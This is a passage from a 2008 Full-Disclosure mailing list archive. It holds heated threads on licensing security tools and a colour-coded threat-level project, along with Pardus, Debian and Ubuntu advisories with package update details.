References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> Message-ID: <93B7B87BB2C7472E905D0BE2F3445766@Appiant> I agree - the biggest BS term in existence is the term "Cyberterror". If my web server crashes, is it the result of a Jihadist? Do I care? There is no such thing as a cyberterrorist. Need proof? Answer me this: If a militant Jihadist takes down the US Power Grid via a "Cyber Attack", will he get his 72 virgins on MySpace? This is based on the assumption that one could find 72 Virgins on MySpace, and those claiming to be so are not pederasts themselves or FBI agents... nevertheless. Look at the methodology behind the Militant Salafic Jihadist movement; it is kill or convert in order to attain the highest order of glory in heaven. There is no caveat in place for crashing servers. The motivation behind a Jihadi hacker and a punk criminal hacker is exactly the same, to either cause malicious harm - because they can - or to gain money. End of issue. ----- Original Message ----- From: "Some Guy Posting To Full Disclosure" To: Sent: Saturday, November 29, 2008 7:07 PM Subject: Re: [Full-disclosure] Security industry software license > Just to summarise what's been said and what I think so we can get back > on topic, and conclude something: > > No-one hacks using metasploit! Go back to 2003. > Terrorists with metasploit! What to you have a picture in your head of > Mr. Jihad Bigbeard using metasploit to shutdown a powergrid? > > Reasons Why It's Hard to archive: > - It violates freedom. > - It's hard to enforce without: invading privacy, expending too much > money/resources. > - Most writers of these tools won't want to have to do this (most > writers of security tools are hackers, you-know: back orifice, pinch, > exploit kits, phising kits, malware creation kits, the entire contents > of milworm, bots, THCs Hydra... it goes on. > - Geographical constraints. All governments doing the exact same > thing at the same time? Or one organisation forcing it onto the net > (with no power to put people in jail or anything). > - You cant/shouldn't moderate the internet. > > Reasons Why It's Pointlessly ineffective: > - Piratebay. > - People writing tools intended for hackers. > - The massive number of tools that you'd have to moderate to be effective. > - If not everything is a dangerous security tool then it's reduced in > effectiveness. > - Most big hacks you see don't take many tools. Like a big database > being dumped with a browser/scripts. > - You don't solve the problem, at all. Maybe reduce it a little. > > > Reasons Why It Wouldn't Happen: > - Most developed western governments like to keep they're 1984 "I'm > watching you" crap behind the curtains. > - Most governments only do these things because something bad > happened and they have to make up a law to cover their asses, or > something bigger than your rapidshare passes is at stake. > - I'd protest - I'd go to my countries(UK) capital and march in protest! > > Reasons Why It Sucks: > - It violates freedom (programs are intellectual property - you can't > do that kind of thing to them and call it nice). > - It would ruin the internet and break a load of enthusiastic geeks' > harts. > - It would force the underground hackers deeper underground. > - It would discourage security professionals. > > Pointless things that people mentioned that made them look like a > child in front of a shit load of subscribers: > - Personal comments. > - Attacks at the way someone writes something instead of what they write > about. > > Questions for to think about/answer: > - Would you deserve a license. Really? (me: NO!) > - Would you wish you had one. (me; yeh!) > - How many of the tools that'd be outlawed have you already written > an equivalent of? (me: loads). > - If you had to outlaw things, would you outlaw tor? (me: I don't wanna!) > > > It's a silly idea. > Final Question: > - Are we finished? Is it over? Is it established that it's a bad idea now? > > -- > I'm your best best friend. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From pinar at pardus.org.tr Tue Dec 2 07:08:46 2008 From: pinar at pardus.org.tr (Pinar Yanardag) Date: Tue, 02 Dec 2008 09:08:46 +0200 Subject: [Full-disclosure] [PLSA 2008-77] ffmpeg: Multiple DoS Vulnerabilities Message-ID: <4934DEFE.8080204@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-77 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-12-02 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= Two vulnerabilities have been fixed in ffmpeg which can cause to a DoS (Denial of Service) Description =========== 1. An endless loop vulnerability when opening corrupt FLV files (issue 699). -- fixed in r15738 2. A divided by zero vulnerability in sub_packet_size. -- fixed in r15739 Affected packages: Pardus 2008: ffmpeg, all before 0.4.9_20080909-48-16 Resolution ========== There are update(s) for ffmpeg. You can update them via Package Manager or with a single command from console: pisi up ffmpeg References ========== * http://svn.pardus.org.tr/pardus/devel/applications/multimedia/ffmpeg/ * http://bugs.pardus.org.tr/show_bug.cgi?id=8734 ------------------------------------------------------------------------ -- Pardus Security Team http://security.pardus.org.tr From mike.cartall at gmail.com Tue Dec 2 08:39:49 2008 From: mike.cartall at gmail.com (Mike C) Date: Tue, 2 Dec 2008 09:39:49 +0100 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <49341071.4050608@gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> Message-ID: On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote: > and how does making a color based on these inputs protect people? > Once all desktops have an icon or widget (say at the right hand corner) with the color, and this is consistently seen everywhere, the users will start associating with their online security. they will be reminded that they have to be careful with the data they share. This, if implemented correctly will be a boon to security industry, where the weakest kinks currently are 'n00b' users. -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From mike.cartall at gmail.com Tue Dec 2 08:42:37 2008 From: mike.cartall at gmail.com (Mike C) Date: Tue, 2 Dec 2008 09:42:37 +0100 Subject: [Full-disclosure] Security industry software license In-Reply-To: <93B7B87BB2C7472E905D0BE2F3445766@Appiant> References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant> Message-ID: On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote: > I agree - the biggest BS term in existence is the term "Cyberterror". If my > web server crashes, is it the result of a Jihadist? Do I care? Yes! The kind of exploiter decides the kind of evil thing that would be done from a zombie machine. You wouldnt want your PC to be a part of an enemy state's arsenal, or an extremist religious organization now, would you? -- MC Security Researcher Lead, Project Chroma http://sites.google.com/site/projectchromaproject/ From joel at helgeson.com Tue Dec 2 09:41:15 2008 From: joel at helgeson.com (Joel Helgeson) Date: Tue, 2 Dec 2008 03:41:15 -0600 Subject: [Full-disclosure] Security industry software license In-Reply-To: References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant> Message-ID: Please tell me there is sarcasm there? The exploiter can either use the exploited machine to make money, which makes him indistinguisable from every other punk on the net, or they access it simply to destroy it; which makes them a malicious punk. Either way, I am not terrorized, and Ramzi al-binwhatever ain't gonna make it to paradise or get his 72 myspace virgins (or second life, or whatever). The Jihadists have no use for the levels of intelligence gathering networks that the Russian empire has. What the heck to Jihadists care who the chain of command is - they lack the military discipline to think that far ahead. ----- Original Message ----- From: "Mike C" To: "Joel Helgeson" Cc: "Some Guy Posting To Full Disclosure" ; Sent: Tuesday, December 02, 2008 2:42 AM Subject: Re: [Full-disclosure] Security industry software license > On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote: >> I agree - the biggest BS term in existence is the term "Cyberterror". If >> my >> web server crashes, is it the result of a Jihadist? Do I care? > > Yes! The kind of exploiter decides the kind of evil thing that would > be done from a zombie machine. You wouldnt want your PC to be a part > of an enemy state's arsenal, or an extremist religious organization > now, would you? > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ From andfarm at gmail.com Tue Dec 2 10:57:10 2008 From: andfarm at gmail.com (Andrew Farmer) Date: Tue, 2 Dec 2008 02:57:10 -0800 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> Message-ID: On 02 Dec 08, at 00:39, Mike C wrote: > Once all desktops have an icon or widget (say at the right hand > corner) with the color, and this is consistently seen everywhere, the > users will start associating with their online security. they will be > reminded that they have to be careful with the data they share. Perhaps you can also make a spy show up on the user's screen every half hour to warn them that their communications may be monitored, and allow them to report suspicious web sites to the appropriate authorities. http://www.telegraph.co.uk/news/worldnews/1561740/index.html From dannf at debian.org Mon Dec 1 22:49:35 2008 From: dannf at debian.org (dann frazier) Date: Mon, 1 Dec 2008 15:49:35 -0700 Subject: [Full-disclosure] [SECURITY] [DSA 1676-1] New flamethrower packages fix denial of service Message-ID: <20081201224935.GE22463@ldl.fc.hp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1676-1 security at debian.org http://www.debian.org/security/ dann frazier December 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : flamethrower (0.1.8-1+etch1) Vulnerability : insecure temp file generation Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-5141 Debian Bug : 506350 Dmitry E. Oboukhov discovered that flamethrower creates predictable temporary filenames, which may lead to a local denial of service through a symlink attack. For the stable distribution (etch), this problem has been fixed in version 0.1.8-1+etch1. For the unstable distribution (sid), this problem has been fixed in version 0.1.8-2. We recommend that you upgrade your flamethrower package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1.diff.gz Size/MD5 checksum: 3138 f6263743cb41f4f75ab9f4dbc76a71a5 http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8.orig.tar.gz Size/MD5 checksum: 23485 04e1b6c5b4e72879e8aa69fcccb0491f http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1.dsc Size/MD5 checksum: 598 4a880e477706f57bcfb806eb46a81922 Architecture independent packages: http://security.debian.org/pool/updates/main/f/flamethrower/flamethrower_0.1.8-1+etch1_all.deb Size/MD5 checksum: 16880 fbc0c1b237503a9d88521b444e4319e0 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJNGi7huANDBmkLRkRAtmHAJ46ID1fo23mpT0LaR+58dF75sgdaACgk1R2 I73MleBHGf32hPSwMhRRQbY= =qNZs -----END PGP SIGNATURE----- From j.sentiar at gmail.com Tue Dec 2 13:11:26 2008 From: j.sentiar at gmail.com (j-f sentier) Date: Tue, 2 Dec 2008 08:11:26 -0500 Subject: [Full-disclosure] Fwd: Iran executes IT expert who spied for Israel In-Reply-To: <6f80feaf0812020511m68f67809ncbfd6bfcf97731ac@mail.gmail.com> References: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com> <4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com> <6f80feaf0812020511m68f67809ncbfd6bfcf97731ac@mail.gmail.com> Message-ID: <6f80feaf0812020511p5fd03ce2t394d81575f2f9a90@mail.gmail.com> Shut up punk, FD is NOT a news relay Got a mailing list ? Get some play there and fuck off 2008/12/1, n3td3v : > > ---------- Forwarded message ---------- > From: n3td3v > Date: Mon, Dec 1, 2008 at 10:23 PM > Subject: Iran executes IT expert who spied for Israel > To: n3td3v > > > "A COMPUTER expert has been executed in Iran after he confessed to > working for Mossad, the Israeli intelligence service. This provides a > rare insight into the intense espionage activity inside the Islamic > republic." > > http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/90ebeaeb/attachment.html From ureleet at gmail.com Tue Dec 2 13:59:06 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 2 Dec 2008 08:59:06 -0500 Subject: [Full-disclosure] Lazy bum approach to security In-Reply-To: <4b6ee9310811291016k10bac99mf10d2f669accc2f9@mail.gmail.com> References: <4b6ee9310811291016k10bac99mf10d2f669accc2f9@mail.gmail.com> Message-ID: <6158bb410812020559x3ab62066h324ac624b0d2f156@mail.gmail.com> i agree. people need 2 b more proactive, instead of reactive. On Sat, Nov 29, 2008 at 1:16 PM, andrew. wallace wrote: > On Wed, Nov 26, 2008 at 5:49 PM, Mike C wrote: >> I'm sure theres no reason to doubt that. The fact remains full-disclosure is >> where it all happens. > > You're taking yourself into a false sense of security there. If you > sit on a mailing list like full-disclosure and expect everything to be > brought to you on a plate you are mistaken. You can't take the lazy > bum approach to security and say, everything I need to know is on > full-disclosure. From my experience the majority of stuff goes on in > the underground communities, full-disclosure is only essentially an > announcement list, the rest is going on in individual communities. > What you need to do is get yourself dug into the underground > communities, you need to get yourself informants and build > relationships with members of communities, you _really_ can't sit on > full-disclosure and expect every security community and hacker > community to bring everything to you. I'm not talking about the n3td3v > group here because luckily I forward the key stuff to full-disclosure > for the lazy bums who can't be bothered to engaged in individual > communities and their members. Let me say though, the real > intelligence isn't on full-disclosure its elsewhere. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Tue Dec 2 13:52:13 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 2 Dec 2008 08:52:13 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com>

Message-ID: <6158bb410812020552n65a5dbefmcea47d15df7d0dc8@mail.gmail.com> all of this is already being done elsewhere. even with desktop apps for color display. do sumthing original please? On Tue, Dec 2, 2008 at 5:57 AM, Andrew Farmer wrote: > On 02 Dec 08, at 00:39, Mike C wrote: >> Once all desktops have an icon or widget (say at the right hand >> corner) with the color, and this is consistently seen everywhere, the >> users will start associating with their online security. they will be >> reminded that they have to be careful with the data they share. > > Perhaps you can also make a spy show up on the user's screen every > half hour to warn them that their communications may be monitored, > and allow them to report suspicious web sites to the appropriate > authorities. > > http://www.telegraph.co.uk/news/worldnews/1561740/index.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Tue Dec 2 13:56:39 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 2 Dec 2008 08:56:39 -0500 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> Message-ID: <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can acess any windows system regarless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention. On Mon, Dec 1, 2008 at 6:32 PM, n3td3v wrote: > Which court order? Post a link. > > On Mon, Dec 1, 2008 at 11:27 PM, Aaron Gray wrote: >> Probably not with a court order. >> >> On Mon, Dec 1, 2008 at 10:51 PM, n3td3v wrote: >>> >>> If they use zero-day exploits then thats illegal. >>> >>> Secondly, are they using zero-day exploits post on public mailing >>> lists or using their own home grown exploits that the bad guys and >>> potentially the vendor doesn't know about? >>> >>> On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray wrote: >>> > "proof", did you read the article ? >>> > They are after your bad guys and probably using zero day exploits !? >>> > On Mon, Dec 1, 2008 at 9:13 PM, n3td3v wrote: >>> >> >>> >> http://news.bbc.co.uk/1/hi/technology/7758127.stm >>> > >> >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Tue Dec 2 13:55:03 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 2 Dec 2008 08:55:03 -0500 Subject: [Full-disclosure] Security industry software license In-Reply-To: References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant> Message-ID: <6158bb410812020555l35d2846bqcd7945078617bdca@mail.gmail.com> does it matter who ur system is hacked by? no. ur system is had either way. it doesnt belong 2 u. On Tue, Dec 2, 2008 at 3:42 AM, Mike C wrote: > On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote: >> I agree - the biggest BS term in existence is the term "Cyberterror". If my >> web server crashes, is it the result of a Jihadist? Do I care? > > Yes! The kind of exploiter decides the kind of evil thing that would > be done from a zombie machine. You wouldnt want your PC to be a part > of an enemy state's arsenal, or an extremist religious organization > now, would you? > > -- > MC > Security Researcher > Lead, Project Chroma > http://sites.google.com/site/projectchromaproject/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Tue Dec 2 13:53:39 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 2 Dec 2008 08:53:39 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com> Message-ID: <6158bb410812020553k70ae3056g7daa9c7a7a2c3057@mail.gmail.com> i was going 2 leave the list, and still would like 2. however, i c that u r back 2 using ur alias instead of ur real name again, posting articles which u didn't write, and generally just going back to ur old ways. i left u alone for what? two days? wow. On Mon, Dec 1, 2008 at 3:52 PM, n3td3v wrote: > Maybe he thinks the same as you and is making fun of the Department of > Homeland Security, SANS Internet Storm Center etc. > > On Mon, Dec 1, 2008 at 4:27 PM, rholgstad wrote: >> and how does making a color based on these inputs protect people? >> >> Mike C wrote: >>> On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote: >>> >>>> By the way, I also noticed that the new site for your project has the >>>> current threat level as yellow. Is it safe to assume that you've already got >>>> your metric systems in place and running? >>>> >>>> >>> >>> Yes, >>> >>> We do have a working framework for color code generation. The inputs >>> to this function include >>> >>> *exploits released in the past week >>> - The severity of the exploit >>> - The application it was in >>> - The language >>> - estimated users of the software >>> >>> *The previous week's color >>> >>> *Localized nature of exploits. >>> >>> We cannot comment more on this until it is refined and standardized. >>> If you are (or know) an antivirus vendor, please contact me offline to >>> move ahead. >>> >>> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Valdis.Kletnieks at vt.edu Tue Dec 2 15:16:44 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 02 Dec 2008 10:16:44 -0500 Subject: [Full-disclosure] Security industry software license In-Reply-To: Your message of "Sat, 29 Nov 2008 18:17:22 GMT." <4b6ee9310811291017r5d641efdx4dc5b375fa43721e@mail.gmail.com> References: <4b6ee9310811291017r5d641efdx4dc5b375fa43721e@mail.gmail.com> Message-ID: <39519.1228231004@turing-police.cc.vt.edu> On Sat, 29 Nov 2008 18:17:22 GMT, "andrew.wallace" said: > I think we should push for this so that attack platforms that are > designed for penetration testers aren't used by the bad guys. Another good article noted by Bruce Schneier: http://www.schneier.com/blog/archives/2008/11/the_ill_effects_1.html "The experts said no one has actually done any research on SIM card cloning because the activity is illegal in the country." -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/6d3bd465/attachment.bin From j.sentiar at gmail.com Tue Dec 2 16:00:18 2008 From: j.sentiar at gmail.com (j-f sentier) Date: Tue, 2 Dec 2008 11:00:18 -0500 Subject: [Full-disclosure] Security industry software license In-Reply-To: <6f80feaf0812020508k15ab2debvb93fda8237126bef@mail.gmail.com> References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant> <6f80feaf0812020508k15ab2debvb93fda8237126bef@mail.gmail.com> Message-ID: <6f80feaf0812020800i42a0f362hd81c912abf98a2@mail.gmail.com> 2008/12/2, j-f sentier : > > Mike C, Andrew wallace, n3td3v (which are the same person), would you > please get the fuck out of this FD list ? > No one want to hear your bull-shit anymore around here. > > > > > > > > > > > 2008/12/2, Mike C : >> >> On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote: >> > I agree - the biggest BS term in existence is the term >> "Cyberterror". If my >> > web server crashes, is it the result of a Jihadist? Do I care? >> >> >> Yes! The kind of exploiter decides the kind of evil thing that would >> be done from a zombie machine. You wouldnt want your PC to be a part >> of an enemy state's arsenal, or an extremist religious organization >> now, would you? >> >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/0aa7c6b0/attachment.html From marc.deslauriers at canonical.com Tue Dec 2 16:24:02 2008 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Tue, 02 Dec 2008 11:24:02 -0500 Subject: [Full-disclosure] [USN-683-1] Imlib2 vulnerability Message-ID: <1228235042.8552.1.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-683-1 December 02, 2008 imlib2 vulnerability CVE-2008-5187 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libimlib2 1.2.1-2ubuntu0.3 Ubuntu 7.10: libimlib2 1.3.0.0debian1-4ubuntu0.1 Ubuntu 8.04 LTS: libimlib2 1.4.0-1ubuntu1.1 Ubuntu 8.10: libimlib2 1.4.0-1.1ubuntu1.1 After a standard system upgrade you need to restart any applications that use Imlib2 to effect the necessary changes. Details follow: It was discovered that Imlib2 did not correctly handle certain malformed XPM images. If a user were tricked into opening a specially crafted image with an application that uses Imlib2, an attacker could cause a denial of service and possibly execute arbitrary code with the user's privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.diff.gz Size/MD5: 111655 1db5e38ae075ba7879e2379de336fa60 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.dsc Size/MD5: 753 d207af283f3356525dd8bf1863b18dde http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1.orig.tar.gz Size/MD5: 911360 deb3c9713339fe9ca964e100cce42cd1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_amd64.deb Size/MD5: 352032 ca8a615db5f3fe5f9d9e7be5bc6e5251 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_amd64.deb Size/MD5: 214630 575972ea6305a67fb7dba4a9767bd738 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_i386.deb Size/MD5: 302506 558d3ca8288047f906d0abe64cacff0a http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_i386.deb Size/MD5: 193346 8814a94983cb3dc69c8751f8ffb0c0a7 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_powerpc.deb Size/MD5: 341950 42cd29c55636cf54b595d40a1d8da334 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_powerpc.deb Size/MD5: 212852 aebcc16c8a0f26d97ff9b8853bc96344 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_sparc.deb Size/MD5: 318490 f96156937b2ac3fddfef13feab5c317b http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_sparc.deb Size/MD5: 194030 74b17b7473671d6bce17168e3a93892e Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.diff.gz Size/MD5: 13311 8aace634a15651f892a707288bb06d80 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.dsc Size/MD5: 873 b0131ffc8e50111ef870a805d74b5603 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1.orig.tar.gz Size/MD5: 617750 7f389463afdb09310fa61e5036714bb3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_amd64.deb Size/MD5: 365864 03137784605c2957899f2e3ea98c7abb http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_amd64.deb Size/MD5: 213966 04d1d6d16c95ef15d400b69f946ef465 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_i386.deb Size/MD5: 334386 8964c1cf0d89fce685e45c275fe9b398 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_i386.deb Size/MD5: 205672 7eda0e69c39446878a3604fcfa2bd100 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_lpia.deb Size/MD5: 341396 c566cf2c1190d50307518180ecbaf1f8 http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_lpia.deb Size/MD5: 209212 cbdccce66f76e6811562e07c69b00001 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_powerpc.deb Size/MD5: 362434 7174f6ee1792aa3e93f90ec6cf6bd05b http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_powerpc.deb Size/MD5: 229776 a5bfce5092d800574750491de6f24f71 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_sparc.deb Size/MD5: 338858 a727f8fe8ee40579070f519ffe850ea6 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_sparc.deb Size/MD5: 200882 6cb8819fdc9d1782627c516510aec328 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.1.diff.gz Size/MD5: 56206 26e4031ba0fcdb20ab253d387503c4f3 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.1.dsc Size/MD5: 843 8801c85496cc40b02fd9c8c8e7a5ecf4 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0.orig.tar.gz Size/MD5: 845017 1f7f497798e06085767d645b0673562a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_amd64.deb Size/MD5: 344406 c04c37389fb2d858d0b564ec88ffaf28 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_amd64.deb Size/MD5: 199718 5c231fd28f7c89db183623a76136058b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_i386.deb Size/MD5: 309666 4268bead6afda98818eddf883709ce2b http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_i386.deb Size/MD5: 190212 3e60cdf97e47607e3fc821af96c1fbb1 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_lpia.deb Size/MD5: 318240 5846ac281ac72f03a22a391e21476c37 http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_lpia.deb Size/MD5: 194098 413867c3a222937d5d90ee0ff4e9af61 powerpc architecture 